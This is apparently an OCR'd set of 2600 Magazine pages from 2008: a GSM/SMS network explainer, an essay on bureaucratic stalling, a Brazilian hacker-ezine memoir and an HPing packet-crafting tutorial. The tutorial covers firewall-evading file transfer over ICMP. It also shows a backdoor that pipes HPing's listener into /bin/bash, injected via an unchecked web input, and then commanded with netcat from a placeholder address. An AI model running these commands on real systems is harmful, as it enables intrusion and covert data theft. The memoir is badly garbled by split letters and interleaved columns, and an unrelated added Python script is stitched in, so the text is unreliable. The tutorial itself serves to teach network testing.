When you sign up for service, your phone number, the IMSI from your SIM card, and information about the capabilities of your account are input into the Home Location Register (HLR). This is a database operated by your wireless carrier, and it largely controls what your handset is both allowed and configured to do on the network (e.g. place and receive calls, send and receive text messages, forward calls to voicemail, use data services, and so forth). The HLR also keeps (approximate) track of your location on the network, in order to deliver calls and messages appropriately. In general, each wireless carrier operates one HLR topology, and large carriers split up subscribers between HLR nodes.

The HLR is the nerve center of a wireless carrier, and if it fails, a very bad day is guaranteed for the person who administers it. At a minimum, nobody will be able to receive incoming phone calls, text messages will be delayed, calls will not forward to voicemail, and self-important people in SUVs everywhere will be unable to use their BlackBerrys while running over old ladies in crosswalks. So, as you might imagine, an HLR outage means the carrier may lose thousands of dollars per minute. Fortunately, redundancy and failover capability are fairly sophisticated. For example, Nortel's NSS19 platform allows for both local and geographical redundancy. HLR databases themselves are also designed with a high degree of redundancy and fault tolerance, allowing rapid recovery in the event of failure.

MSC

An MSC is a Mobile Switching Center. In effect, this is a Central Office for mobile phones.
However, unlike traditional wireline Central Offices, which generally cover only one city (or in large cities, as little as one neighborhood), MSCs generally cover an entire region. These incorporate all of the functionality you would expect from a modern Central Office, along with a lot of whiz-bang features specific to mobile phone applications (such as the VLR described below). MSCs can be either local or gateway MSCs. A gateway MSC is analogous to a tandem switch, and can communicate fully with other wireless and wireline networks. A local MSC is analogous to a local switch, although these switches can often route directly to the PSTN (and increasingly, VoIP networks) for voice calls.

VLR

Your mobile phone will generally be registered in the Visitor Location Register (VLR) of the Mobile Switching Center (MSC) serving the area in which it is located (although the HLR does not necessarily have to be decoupled, so in smaller GSM systems the VLR may be the same as the HLR). The VLR retrieves a local copy of your subscriber profile from the HLR, so most routine queries can be processed against the VLR rather than the HLR. This minimizes load on slow and expensive inter-carrier SS7 (and sometimes even X.25) links and the HLR servers. These systems are also designed with a high degree of fault tolerance, because it's also bad if they fail. However, the failure of a VLR will cause only a localized outage. Failed calls will generally be forwarded to voicemail in the interim, and SMS messages will be held for delivery until the VLR is again operational.

MXE/MC

The MXE (also referred to as MC) handles messaging. On GSM systems, this includes voicemail, SMS, and fax features (yes, the GSM standard includes sending and receiving faxes for some reason).

SMSC

Hey, we finally got to the piece that really matters. The SMSC is the component of the MXE which handles SMS origination and termination. SMS messages sent or received generally pass from your handset to the MSC to the MXE to the SMSC, and then either in the reverse direction (for on-network SMS) or to the gateway MSC for inter-carrier delivery.

Message flow

I'm a visual person, so here's a visual depiction of how an SMS is sent. Read it from left to right:

[Figure 1: Mobile SMS Origination. Diagram drawn by Carre]

Note that the SMS protocol accounts for the unreliability of wireless networks by using an acknowledgment sequence.
Next, here's a visual depiction of how your phone receives SMS messages from the network. Read it from right to left:

[Figure 2: Mobile SMS Termination. Diagram drawn by Carre]

Note that the acknowledgment sequence is also end-to-end, as in Figure 1.

Billing

While the GSM standard defines how the SMS protocol works and the data structures associated with it, billing is left up to the carriers. This is a contentious issue, particularly overseas where carriers do not charge for receiving SMS messages. Unlike email, SMS is billed per message, and carriers will generally not deliver messages unless they have a billing arrangement with the originating carrier. This has given rise to inter-carrier SMS providers, such as VeriSign, who negotiate wholesale billing arrangements on behalf of carriers. Generally, in the absence of a billing arrangement, carriers will refuse delivery of SMS messages. This is a particularly glaring issue when using SMS short codes. For example, the popular 8762 (UPOC) short code is not available to Sprint subscribers, because Sprint lacks a billing arrangement with Dada (the owner of Upoc).

Well, it's the end of my shift here in the Central Office, so enjoy the rest of your summer and please wear ear plugs if you dance near the big speakers. Instead, save your hearing for The Last HOPE in New York, where I'll be speaking this year!
Hacking Society
by Barrett Brown

"holding" (hōl'diŋ) 1. in certain sports, the illegal use of the hands and arms to hinder the movements of an opponent
"action" (ak'shən) 1. the effect produced by something. 2. a) a military encounter b) military combat in general

Everyone is familiar with what holding actions are; we experience them every day of our lives. What many people may not know is that holding actions can be very carefully planned using statistics, making them a powerful tool of manipulation. First, let's acquaint ourselves more specifically with what a holding action is.

Scenario One: Let's say, for example, that you are trying to get a refund for some small item you bought but which you received in the mail broken. The item cost $30.00, but you paid for it, and you want to get what you paid for. You call the company and are greeted by a phone tree. The phone tree is the first step in the company's holding action against you. You spend forty minutes navigating around the tree, and you finally reach a customer service representative, who informs you that in order to get a refund or exchange, you need to have the original receipt, fill out some forms they send you in the mail, and send your item back to them. You wait for your forms in the mail, but three weeks later they haven't come. So you spend another forty minutes on the phone tree to reach another representative, who apologizes and says the forms will be sent to you. This step can be repeated as many times as necessary until you get so tired of wasting your time that you just give up on the refund entirely. This is an example of a successful holding action by the company against you. Through the use of phone trees and red tape, the company avoided spending money on you. In fact, because time is equal to money in most people's lives, they made you spend even more money.
Scenario Two: Now let's say, completely hypothetically, that you are an American president. Oh, I don't know, how about Ronald Reagan. And you are two weeks away from your re-election day. Something bad comes out in the news-for example, Reagan molests a Girl Scout-that threatens your numbers in the polls, and you need to distract the public just long enough to ensure your re-election. There happen to be US prisoners of war in Iran, and you make a secret deal with the Iranians that if they release the hostages the day after re-election, you will give them some guns or drugs or something. Then you go on TV and promise that if you get elected, the hostages will be released. This is another form of holding action which uses the media. The president does not need to prove the Girl Scout wrong or clear his own name. He just needs to hold the people's attention for two weeks, until he gets re-elected. Distraction holding action.

Scenario Three: You are a homeless heroin addict. You are sent to jail for a crime you did not commit. While in the city jail, awaiting trial, you are in excruciating agony because your body is suffering from opiate withdrawal. Every day that you are incarcerated is a day in agony. Your public defender tells you that you can plead guilty and get out in two days, or you can fight to prove your innocence, which will take months. You are caught in a holding action (as well as a holding cell), and most people in these conditions fold under the pressure.

Holding actions are used on us every day, in ever-increasing numbers. Major companies actually have statistics which tell them exactly what percentage of customers will hang up or reach the wrong person when calling an automated phone tree, and they count on those numbers. They save money with every customer that does not reach them, or so their logic goes. The main commodity which a holding action manipulates is time.
Whether we realize it or not, time is money, and since corporations, private interest groups, and wealthy individuals have much more money and time than the average person, these large entities will always win any given holding action. Let's examine scenario one again. A customer in this scenario who is somewhat poor may not have forty minutes to spend on a phone tree. Either they are busy working for minimum wage, or they are spending their free time doing laundry and shopping. A poor person often does not have the time to spend on red tape and will give up early, thus saving the manipulative entity in question from replacing their defective product. A wealthy individual in scenario one would have more time to wait on hold, or even a secretary to make the call instead, thus increasing the chances that they will end up getting what they paid for.

Now that we understand a little about how holding actions are used against us, let's think about how they can be used to our advantage. The basic idea is to stall for as long as possible until your enemies either give up, forget or lose the paperwork regarding you, or decide that it is costing them too much money, or until you are in a better position to resolve the matter. The poor soul in scenario three could have fought his own holding action by insisting on a trial, but not a speedy one. The judicial system in the U.S. functions primarily on "plea bargains," which are deals made with the District Attorney. Most courts have no interest in trials because they cost too much money and time. So in the case of scenario three, assuming the charge was small and the person had no prior record, they could insist on a trial. It would take a few months, but chances are good that the charges would be dropped when the DA realized that their own holding action was not working. A friend of mine did exactly this, going to court every month for three years, stalling the case. Every month the DA would offer a new deal, and every month my friend would say, "I want a trial."
Finally, after they had postponed the trial to the farthest possible legal time limit, the DA made one last offer, which was fair.

Have an ugly looking credit report? File a dispute on every single bad mark you have. Companies, especially creditors, are routinely bought by other companies, and many times paperwork or data is lost in the transition. When you dispute a claim on your credit report, the burden of proof is on the company. They only have a limited amount of time to prove that you owe them money, or they have to drop the claim from your report. Because these companies are so busy, it is very common for claims to be dropped simply because the creditor did not have the time to find your file and send it to the credit reporting agency. In addition, if your claim is small, it costs the company more money to prove that you owe them than it does to just drop the whole matter. This is using a holding action to your advantage.

Another example is lawsuits. Part of the reason why large companies routinely settle stupid lawsuits for large sums of money is that they are aware of how much more money, time, and publicity it would cost them to go to trial.

Time and information are the two most important commodities in our world today. The more information you have about your opponent and about how their time is allocated, the better your ability to contrive ways to distract your opponent from using time against you. The more control you have over an opponent's time, the less they have over yours. The ever-growing complexity in bureaucracies, aided by the growth of technology, ensures that manipulating people's time is a trend which will only continue to grow and be refined in the years to come. The more you are aware of these processes, the better-equipped you will be to use them to your advantage.
  • 17. Th i r t e e n Y e a r s S t a r t i n g a B a c ke r o f S c e n e by Derneval Ribeiro Rodrigues da Cunha together, so they cou ld exchange i nformation. I had to have people to ta l k about. They had For those of you who don 't remember me, to know about hacki ng. I had to spread the I ' m the one who wrote "Hacki ng in Braz i l " and word for that to happen, so that people a l l "Starting a Hacker Scene." Maybe one o r two around Braz i l-those that deserved to be cal led of you have heard of Brazil ians on the i nternet. "hackers"-would know what it was a l l about U nfortunately, there are a great many of them and hold meeti ngs. Later on, the thi ng wou ld cal l i ng themselves hackers and defacing be to prepare for a B raz i l ian hacker conference. websites. No, I ' m not the one who bul lsh itted So I started the easiest way: by starti ng an elec- those guys i nto doing electronic vandal ism. tronic publ ication . This was when everybody What I did was to start writi ng the first Braz i l ian was just starti ng to know about the i nternet, j ust hacker ezine i n 1994. The i nternet wasn't avail- before Braz i l ians cou ld get commercial i nternet able back then- people cou ld only learn about access. My ezi ne was the first on the scene. it at un iversities and in a few other places. It My boss didn't fire me when he heard about j ust so happened that I did know about it. And my plans; he u nderstood things. But everywhere there I learned about hacker eth ics, viruses, I heard of, a bunch of people joi ned and started phreaki ng, and a l l that stuff. I was i nvolved thi ngs. I, though, had to start on my own. I i n setting up an ecology I nternet discussion borrowed articles from the public domai n here among elementary schools. Then I heard about and there, asked for permission to publish this a "Hacker and Virus Congress" i n Buenos Aires, or that, someti mes rewrote thi ngs, and did some Argenti na. 
It ran for about four days, which I writi ng on my own. Some of the stuff was so used to learn and tal k with people from Hacktic good that it's sti l l published today without my and 2 600 and with several Argentine people perm ission or anyth ing else. And, even today, I connected with computer security, among haven't completely decided if I shou ld sue the other thi ngs. guys that did it. There were people who bought Few people in South America had I nternet books because my article was i n them. accounts. Most thi ngs happened in BBSes, on Thi ngs worked just fine for the publ ica- Fidonet or the l i ke. Computer viruses were tion. My choice of writing in pure ASCII code the mai n subject when people tal ked about helped it to be uploaded to and downloaded computer i nsecurity. But they generated a from i n B BSes a l l around the country and lot of press coverage in those days. It was, abroad, in Portuguese-speaking places l i ke though, very difficult to get any information Portugal and Mozambique. Barata Eletrica about anyth ing l i ke "dark subjects." Myself, I ("Electric Cockroach") spread everywhere l i ke had to hack my way i nto an academic internet a disease. It appeared i n places l i ke Usenet, account. I did this legally, not by using some- l i ke the 2 600 l ist and s o c . c u l t u r e . bra z i l . body else's account. I ' m not going to tal k Myself, I made i t avai lable for down- about bad connection l i nes; phone modems load from the EFF and e t e x t . argo Check were everyth ing but rel iable. (I wrote about Google for the current web address or visit th is i n "Braz i l ian Phone System.") I'm tal king bara t ae l e t r i c a . c j b . ne t . The people from the about people using 600 bps, maybe 1 200 computer science faculty of a federal u n iversity, bps, sometimes 2400 bps modems. 
Instead of U FSC, kept a mi rror on their website for about down loading big fi les from a B BS, you 'd rather a decade-and I ' ve never set foot there; thanks choose the fi les first, then go there yourself with to them ! At my own U n iversity of Sao Pau lo, floppies to pick them up. I myself wou ld use they wou ld not hear a thi ng about it; i n fact, the i nternet on ly from u niversity computers; I they hated me. I al most lost my access there but never had to use dial-u ps to access anythi ng. got it back months later. Computer students themselves didn't know Soon people started to write other, more much about it except what they learned from aggressive publications, l i ke the ezine Axur 05, movies l i ke Wargames. That was in the second Nethack, and a few others, mostly on BBSes. biggest u niversity in South America. Those were That was at the time of Mitnick's arrest. If the "golden years." someone wanted to be known as a hacker, he So, what was my goa l ? Just to get people and his friends wou ld write an ezine. Lots of Summer 2008 ------------------------------------- hge 17
good information started to be spread around, like philes about how to get free phone calls in the Brazilian phone system. (They eventually fixed that.)

The ezine grew quite complex. For one thing, I started to enjoy writing. It became more than a hobby. It always took more time to write things. And if I could not enjoy reading it myself again, I would rewrite the article. The ezine, originally meant to be something simple, grew complex, with sections like a FAQ, about, history, better articles, and a news section that was so troublesome to make that I turned it into a blog (barataeletrica.blogspot.com). If I wrote something, there would be a reference or a link saying where I took it from.

People started offering services like how to improve my HTML (it sucks) and easy access to the web site, for free. I declined. I started it all alone; nobody wanted to spare time to help me. Once I was famous, who cares? Besides, a better ezine would involve getting more complex. My focus wasn't in delivering better things to the growing number of people who were getting Internet access. The way it was, I was getting three or four letters a day asking, "Can you teach me hacking?"

I could have gone corporate. But I would have had to charge for that. In fact, when I started the ezine, the freeware concept was not understood. For me, it meant that I would not have to worry about paying wages, taxes, revenue, income, consumer rights, and so on. I would have had to register the ezine; then I would have been a target. If anybody sued me and I lost, that would have been it. And the kind of articles I published were often in gray areas of the law. If you're a hired hand, you need to work eight hours a day, but if you're a boss, you work twice that much.

My opinion was quite respected. Among other things, I can say I started the talk about Linux in Brazil. Phiber Optik came here; I told everybody to ask him to compare Windows security versus FreeBSD. Newswriters did not know anything about it. I was also there to give support when an activist from Amnesty International, Fernanda Serpa, started the "Free Kevin Mitnick" movement in Brazil. Maybe I'll write about it someday. When there was talk about bringing Markoff and Shimomura to a US$400 per ticket conference to talk about "the pirate and the samurai," I wrote an article in the ezine. Later on, nobody talked about bringing those guys here to Brazil for a conference anymore. My task was completed. The "hacker scene" had happened. It was no dream anymore. There were some very strong meetings, 2600 meetings, and people were talking about it everywhere. And people knew the difference between good hackers and lamers. But then the paper press started to run articles teaching bad things for fun. An issue of the now-defunct Brazilian edition of Internet World surprised me in that way. Mostly, it had articles telling everything about hackers' bad deeds. Put together, the articles gave knowledge about how to nuke other PCs. My good luck was I declined an interview. Maybe I would have been considered part of the group. Other magazines also did similar articles. Some guys started to write books using material from the ezines. And these books were a hit, even if things in there didn't work anymore. I can trace today's Brazilian electronic vandalism back to those mags and books.

My "hacker" congress never came off. The internet was spreading fast, but I didn't have a computer science degree. My knowledge of it was mostly Unix-based, and it was quickly devalued. Like most dinosaurs, I didn't believe in a commercial Internet. Maybe it was a bad thing that I wasn't money driven. Instead of setting up an enterprise, I enrolled in a post-graduate course. Don't think that the people who started Yahoo! were more gifted than me. I took my motto "I login therefore I am" (check Google; I said it first) and began to gather all my experiences with the hacker scene into an academic work.

People kept pressing me to write a book about all my exploits rather than a thesis. And the fact is that I collected enough data to write a lot about those days. I could fill two or three books just with information from the ezine. Some day, I'll do it. But for the moment, writing a book in order to just earn money would be selling out. And I could already have done that even with an "I am a friend of Barata Eletrica's author" card. One ex-friend of mine got his US$20 debt pardoned just because he introduced me to his creditor, just like that. If I wanted to write about "how to hack things," I could have done it much earlier. I maybe even could have earned cash doing lectures somewhere, and got a Masters degree. I could also simply have stopped hacking and got a good job in computer security. But, one can't write a thesis and do computer security at the same time. And I'm still thinking about it, but it has to be outside Brazil.

In fact, I soon found out that some people were sticking with me because of the "dark side." Sometimes I even lost "friends" because they gave up on me writing about them. I always warned about my focus on hacker ethics and the pursuit of knowledge. I changed my writing in order to avoid copycats. The ezine is still about hacking, but it now takes a much broader view. How would you teach hacking without using computers? Hacking computers is not the only way to learn about hacking. Some people

Page 18 ------------------- 2600 Magazine
promised me that they would keep on reading. And I kept writing the ezine and a blog because it's such a waste to stop.

It sometimes pays off to do a blog. Once I posted that I needed a few memory chips for my old-fashioned computer. I live in Sao Paulo. One guy from Rio de Janeiro read it, asked for my postal address and sent the chips, along with other things: about 16 kg of hardware, a complete CPU he'd made up of old pieces he gathered from friends. He threw a party, people brought things, they set up a Pentium 233 with a 30 gig HD, and they sent it and some other things to me, by FedEx. I couldn't believe it and sent him some t-shirts by way of thanks. I still used that computer until last Christmas, when a big fan and friend of mine sent me a Pentium 4 with a 150 gig HD and a few science fiction magazines. Maybe that guy is one of the thirty-five that prevent God from destroying the Earth. I don't know.

The problem today with writing a hacker ezine and blog is that today, everybody's got much more access than at the time I started. And there are many people claiming hacker knowledge. Even YouTube has a video or two about computer insecurities. One doesn't have to go underground to learn about "dark subjects." One has to have the conscience, which is the main subject about which I used to write, right from the beginning. If you write about how to do it, that will get old soon. When you write about how to think about it, it will stick. People still can get old issues of my ezine and find good thinking material. That might save their butts one day.

Unfortunately, I could not write a thesis about what I did. The Portuguese language is tough to read. My not writing a book is also something to blame myself for. How could I write a book about "starting a hacker scene" and then get a "normal" job anywhere but in computer security? There was a "hacker" conference in Sao Paulo, where I live. I could not go. In the USA or Europe, it would be no problem. But not here. There were lots of TV cameras everywhere. No way. At that time, I was working right next to an office where people were trying to sue YouTube. I even knew which books of legislation were being consulted. These people next door did not know about my past, and why should they? Yet, a few weeks ago, I attended another security conference, YSTS. But there were fewer cameras and none from TV.

Also, people always charge you more if they know you're famous. For a time, I would even check famous people for stories about how to deal with fame. It's no easy task, but I believe that sometime in the future, everybody will have to learn about it, how to relate to the press and how to use fame for a purpose. People on the internet don't know this, and they lose great opportunities. It's like that: for one thing or another, you get famous. Before you know it, it's gone. People have to consider that getting famous is no fairy tale. In order to make some good use of it, one has to know about it. If you publish something today in YouTube or in a blog, it will be remembered somewhere, sometime. You've changed, grown older, but your past is still there, just like it was. I was very fortunate the way I wrote things. I never used an alias to write, and I have no regrets about it.

When you get famous, some people get to know you because they are getting famous at the same time, but in different places, with other occupations. Mauro Marcelo, who got appointed the chief of the Brazilian Intelligence Agency (ABIN), did know me. I could have interviewed him there and then, but that's another story, and a sort of funny one. Eventually, he was kicked off the job because of the intrigue there, which makes me think he's not such a bad guy; those guys from ABIN aren't popular. When he was there, he bothered to answer an email of mine. Who knows? Maybe someday I'll contact him again. He might have some good stories to talk about. He was, after all, the first Brazilian "Cyber" cop. He wouldn't catch me, for sure. I stopped all "hacking" when I began writing the ezine. Maybe not all of it, but why bother? That magic word "please" works wonders. You just have to know who to ask. If the guy doesn't know you, just play that song, "Let me please to introduce myself, I'm a man." You can't always get what you want, but sometimes you do. I would never know how to stash things inside University of Sao Paulo computers without a little help from my friends. I would always sing "Don't you forget about me" for myself, later. You can get high doing things like these. Believe me.

After thirteen years of Barata Eletrica, is anybody snoring out there? It's been a great experience, being famous for writing an ezine. I did it mostly because of the readers. What a feeling when you meet someone who got his life changed because of an article of yours! I never got laid because of it, but I did learn a lot about a lot of topics, from public relations to law and journalism. Maybe someday, I'll get a job out of it. I think everybody should try it. Someone said that if you don't like the news, you should go out and make some of your own. Everybody can help change the world with simple gestures. Just interact with your community. My ezine started like that: a publication for a few people using an internet-connected computer lab nearby. Think about it.

Summer 2008 ------------------- Page 19
HPing (The Part I Forgot)

In my last article ("Essential Security Tools," 2600 Winter 2007-2008), I wrote about some security tools, told readers where to get them, and gave a basic introduction of what they do. Most astute readers may have noticed that the section on HPing was very brief. When I was drafting the article, I was moving subjects around, and so I misplaced the main body of my HPing section. When I received my copy of 2600 and noticed this, I firmly planted my face in the palm of my hand and let out a loud "D'oh!" To make up for it and to absolve myself of this error, I am dedicating this article entirely to the HPing utility. HPing (http://www.hping.org) is a great tool to have. You can use it for very simple tests or you can set it up to do something more advanced, such as transfer files. Let's start off with the basic stuff.

HPing Basics

HPing, at its most basic, is a packet crafter. You can get a lot of use out of just this basic function. Let's examine using HPing to "ping" a TCP port:

[root@doormouse ~]# hping2 localhost -S -p 22
HPING localhost (lo 127.0.0.1): S set, 40 headers + 0 data bytes
len=44 ip=127.0.0.1 ttl=64 DF id=0 sport=22 flags=SA seq=0 win=32792 rtt=0.2 ms

In this example, we've asked HPing to send TCP/SYN packets (-S) to localhost, with the destination TCP port set to 22, which is for ssh. The reply packets we get are the next part of the TCP three-way handshake, with the SYN/ACK flags set. This is indicated in HPing by the flags=SA field. This tells us that the TCP port is open and that we are allowed to access that TCP port. This is useful in testing whether or not your firewall rules are set up properly. Let's say that you have a web server and that you want to ensure that people from the 10.20.30.0/24 network are allowed to access it. You can just HPing the server with the SYN flag set and see if you get a reply.

You can set all, some, or none of the TCP flags if you wish to check TCP stacks or your Intrusion Protection System (IPS). For example, if you have an IPS set up and you want to test your filters against odd TCP flag settings, you can use HPing to do that:

[root@doormouse ~]# hping2 localhost -FPU -p 999
HPING localhost (lo 127.0.0.1): FPU set, 40 headers + 0 data bytes
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=999 flags=RA seq=0 win=0 rtt=0.1 ms

In addition to TCP packets, HPing can send UDP. The next example shows UDP packets sent to port 0, which is not listening, on a Check Point SofaWare box:

[root@doormouse ~]# hping2 210.210.210.1 -2
HPING 210.210.210.1 (eth0 210.210.210.1): udp mode set, 28 headers + 0 data bytes
ICMP Port Unreachable from ip=210.210.210.1 name=my.firewall

Even though nothing is listening on that port on that host, we still know that the IP address is alive. It should be noted that some firewall software and operating systems will just drop these packets without sending anything back.

You can even craft packets at the IP layer, though this can be a bit tricky, depending on the protocol that you are attempting to use. In the tcpdump output shown below, I used "hping2 localhost -0 -v -H 41" to send IP packets to IP protocol 41, which is IPv6-in-IPv4, without any payload:

[root@doormouse ~]# tcpdump -n -vv -e -s 1514 -x -i lo proto 41
tcpdump: listening on lo, link-type EN10MB (Ethernet), capture size 1514 bytes
[...] 00:00:00:00:00:00 > 00:00:00:00:00:00, ethertype IPv4 (0x0800), length 34: (tos 0x0, ttl 64, id 8251, offset 0, flags [none], proto IPv6 (41), length 20) 127.0.0.1 > 127.0.0.1: [|ip6]
        0x0000:  4500 0014 203b 0000 4029 5c84 7f00 0001  E....;..@)......
        0x0010:  7f00 0001
13:33:09.025631 00:00:00:00:00:00 > 00:00:00:00:00:00, ethertype IPv4 (0x0800), length 34: (tos 0x0, ttl 64, id 41944, offset 0, flags [none], proto IPv6 (41), length 20) 127.0.0.1 > 127.0.0.1: [|ip6]
        0x0000:  4500 0014 a3d8 0000 4029 d8e6 7f00 0001  E.......@)......
        0x0010:  7f00 0001
13:33:10.026089 00:00:00:00:00:00 > 00:00:00:00:00:00, ethertype IPv4 (0x0800), length 34: (tos 0x0, ttl 64, id 18791, offset 0, flags [none], proto IPv6 (41), length 20) 127.0.0.1 > 127.0.0.1: [|ip6]
        0x0000:  4500 0014 4967 0000 4029 3358 7f00 0001  E...Ig..@)3X....
        0x0010:  7f00 0001

The last of the basics I'm going to talk about is the ability to specify your source address. This is excellent for testing anti-spoofing features of your firewall or to perform "idle" scans. I leave that as a project for you to figure out on your own.

Now that you know how to craft basic packets with HPing, you may start to wonder why you would use this for anything except port scans or security-related measures. Imagine that you work
for a managed service provider and that you need to monitor both system health and service health. You can incorporate HPing into your service health monitoring by setting up a basic script which will craft packets, send them to the service in question, deliver a payload if needed, and then report back to your management station whether or not the service is up, depending on the response received by HPing.

Advanced Features

One of HPing's nice features is the ability to transfer files across a "ping" session. I've only done this with text files, but I'm sure that someone out there knows how to successfully transfer a binary file like an image. Suppose you have a text file that you need to transfer, but all the normal file transfer options like FTP(S), SFTP/SCP, and HTTP(S) are blocked by a firewall; however, ICMP is allowed out. You can use HPing to transfer the file across ICMP. First you will have to set your target server to be in a listen state:

[root@doormouse ~]# hping2 localhost --listen signature --safe --icmp
Warning: Unable to guess the output interface
hping2 listen mode
[main] memlockall(): Success
Warning: can't disable memory paging!

Now that we have someone listening, let's transfer the file from our source machine:

[root@doormouse temp]# hping2 localhost --icmp -d 100 --sign signature --file ./random.stuff
HPING localhost (lo 127.0.0.1): icmp mode set, 28 headers + 100 data bytes
[main] memlockall(): Success
Warning: can't disable memory paging!
len=128 ip=127.0.0.1 ttl=64 id=12770 icmp_seq=0 rtt=0.3 ms
len=128 ip=127.0.0.1 ttl=64 id=12773 icmp_seq=1 rtt=0.1 ms
len=128 ip=127.0.0.1 ttl=64 id=12775 icmp_seq=2 rtt=0.2 ms
len=128 ip=127.0.0.1 ttl=64 id=12777 icmp_seq=3 rtt=0.2 ms

--- localhost hping statistic ---
4 packets tramitted, 4 packets received, 0% packet loss
round-trip min/avg/max = 0.1/0.2/0.3 ms

The listening side will then show:

hping2 listen mode
[main] memlockall(): Success
Warning: can't disable memory paging!
Line 1
Line 2
Line 3
Line 4
End of Important File

Looks like we managed to transfer our important file successfully! Most people won't sit and examine ICMP logs, so you may be able to evade any firewall or IPS in the way.

Let's examine the same scenario, except the location you are at only allows CUPS outbound and does deep packet inspection, so you can't re-bind your FTP or SFTP server to that port. I know this is far-fetched, but work with me on this. On the server on the remote end:

[root@doormouse ~]# netstat -na | grep LIST | grep 631
tcp        0      0 127.0.0.1:631           0.0.0.0:*               LISTEN
[root@doormouse ~]# hping2 localhost --listen signature --safe -p 631
Warning: Unable to guess the output interface
hping2 listen mode
[main] memlockall(): Success
Warning: can't disable memory paging!
Line 1
Line 2
Line 3
Line 4
End of Important File

The command to send the file over TCP with no flags looks like this:

[root@doormouse temp]# hping2 localhost -p 631 -d 100 --sign signature --file ./random.stuff
HPING localhost (lo 127.0.0.1): NO FLAGS are set, 40 headers + 100 data bytes
[main] memlockall(): Success
Warning: can't disable memory paging!
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=631 flags=RA seq=0 win=0 rtt=0.0 ms

You can transfer the file to your server over CUPS without interfering with the running CUPS one.

Keep in mind that files transferred this way are not encrypted. Although most people won't be inspecting packets that much, anyone snooping on the wire can grab your information.

You can also use HPing as a back door. Get the following command running on a remote host, possibly through an insecure website with an unchecked input variable: hping2 -I eth0 --listen signature -p 80 | /bin/bash. Then, use netcat to do something like this: echo "signature reboot;" | nc 333.444.555.666 80. Anything after the word "signature" in the echo command will be processed by the /bin/bash to which HPing's output is being piped, and so the server reboots. Try this with your own machines: use signature touch remote.touched.file; to see that the listener will process what is being asked of it. You won't see anything on the console, but when you stop HPing and do a quick ls, you should now see a new file called remote.touched.file in the current directory.

Another use for this technique is as a "port knocker." If you don't want to leave your SSH daemon up and running all the time, set up HPing on your SSH server. Whenever you want to start your SSH daemon, use the command signature service sshd start;.

Conclusion

As you can see, HPing is a great tool for both basic and more advanced applications, and it can be used in a variety of different ways. It's excellent for helping people to learn how the IP stack works, especially the TCP flag settings, and it's great to use in or along with custom applications. The topics I've covered here in this article are just the beginning, and I strongly urge you to become familiar with this powerful tool.

Shouts: magikh0e, Ihab, Exial, JohnPNP and, of course, eXoDuS. (YNBABWARLf)
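The service-health script the article suggests can be built on hping2's reply lines. The following added example (my code, not the article's) parses the outputs shown above, the flags=SA, flags=RA and ICMP Port Unreachable cases copied here as sample input, into an open/closed/filtered verdict; probe_command is assumed glue around hping2's real -c (count) option.

```python
"""Service-health check built on hping2 output (added example, not from the article).

A monitoring script runs an hping2 probe and reads its reply lines; this module
parses those lines and turns them into an open / closed / filtered verdict.
probe_command() is assumed glue for such a script; hping2's -c option is real
and limits the number of probes sent.
"""
import re
from statistics import mean

# One hping2 TCP reply line, e.g.
#   len=44 ip=127.0.0.1 ttl=64 DF id=0 sport=22 flags=SA seq=0 win=32792 rtt=0.2 ms
TCP_REPLY = re.compile(
    r"len=(?P<len>\d+) ip=(?P<ip>[\d.]+) ttl=(?P<ttl>\d+) (?:DF )?id=(?P<id>\d+) "
    r"sport=(?P<sport>\d+) flags=(?P<flags>[A-Z]*) seq=(?P<seq>\d+) "
    r"win=(?P<win>\d+) rtt=(?P<rtt>[\d.]+) ms"
)
# What hping2 prints when a UDP probe draws an ICMP error, e.g.
#   ICMP Port Unreachable from ip=210.210.210.1 name=my.firewall
ICMP_UNREACH = re.compile(r"ICMP Port Unreachable from ip=(?P<ip>[\d.]+)")


def probe_command(host, port, flag="-S", count=3):
    """argv a monitor would run: a few flagged probes at one port, then exit."""
    return ["hping2", host, flag, "-p", str(port), "-c", str(count)]


def parse_replies(output):
    """Extract TCP replies and ICMP port-unreachable reports from hping2 output."""
    replies = []
    for line in output.splitlines():
        m = TCP_REPLY.search(line)
        if m:
            replies.append({"kind": "tcp", "ip": m["ip"], "sport": int(m["sport"]),
                            "flags": m["flags"], "win": int(m["win"]),
                            "rtt": float(m["rtt"])})
            continue
        m = ICMP_UNREACH.search(line)
        if m:
            replies.append({"kind": "icmp-unreach", "ip": m["ip"]})
    return replies


def classify(output, expected_port=None):
    """Decide what the probed port is doing, using the rules the article applies by eye.

    SYN/ACK (flags=SA)  -> open: the host answered and the firewall let the probe through
    RST     (flags=RA)  -> closed: host up, nothing listening (or odd flags were rejected)
    ICMP port unreach.  -> closed, but the host is alive (the UDP case)
    nothing at all      -> filtered: silently dropped, or the host is down
    """
    replies = parse_replies(output)
    tcp = [r for r in replies if r["kind"] == "tcp"
           and (expected_port is None or r["sport"] == expected_port)]
    rtts = [r["rtt"] for r in tcp]
    result = {"replies": len(replies), "rtt_ms": round(mean(rtts), 3) if rtts else None}
    if any("S" in r["flags"] and "A" in r["flags"] for r in tcp):
        result.update(verdict="open", reason="SYN/ACK received: port open and reachable")
    elif any("R" in r["flags"] for r in tcp):
        result.update(verdict="closed", reason="RST received: host up, nothing listening")
    elif any(r["kind"] == "icmp-unreach" for r in replies):
        result.update(verdict="closed",
                      reason="ICMP port unreachable: host alive, UDP port closed")
    else:
        result.update(verdict="filtered", reason="no reply: dropped by a firewall or host down")
    return result


# Sample inputs: the three hping2 outputs shown in the article, used here as test data.
SYN_OUT = """HPING localhost (lo 127.0.0.1): S set, 40 headers + 0 data bytes
len=44 ip=127.0.0.1 ttl=64 DF id=0 sport=22 flags=SA seq=0 win=32792 rtt=0.2 ms
"""
FPU_OUT = """HPING localhost (lo 127.0.0.1): FPU set, 40 headers + 0 data bytes
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=999 flags=RA seq=0 win=0 rtt=0.1 ms
"""
UDP_OUT = """HPING 210.210.210.1 (eth0 210.210.210.1): udp mode set, 28 headers + 0 data bytes
ICMP Port Unreachable from ip=210.210.210.1 name=my.firewall
"""
# Constructed: a probe that drew no answer at all (only hping2's banner line).
SILENT_OUT = "HPING 10.20.30.40 (eth0 10.20.30.40): S set, 40 headers + 0 data bytes\n"

if __name__ == "__main__":
    print(" ".join(probe_command("localhost", 22)))
    for name, out in (("ssh/SYN", SYN_OUT), ("FPU", FPU_OUT),
                      ("udp", UDP_OUT), ("silent", SILENT_OUT)):
        v = classify(out)
        print(f"{name:8s} {v['verdict']:8s} rtt={v['rtt_ms']}  {v['reason']}")
```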
by Sai Emrys
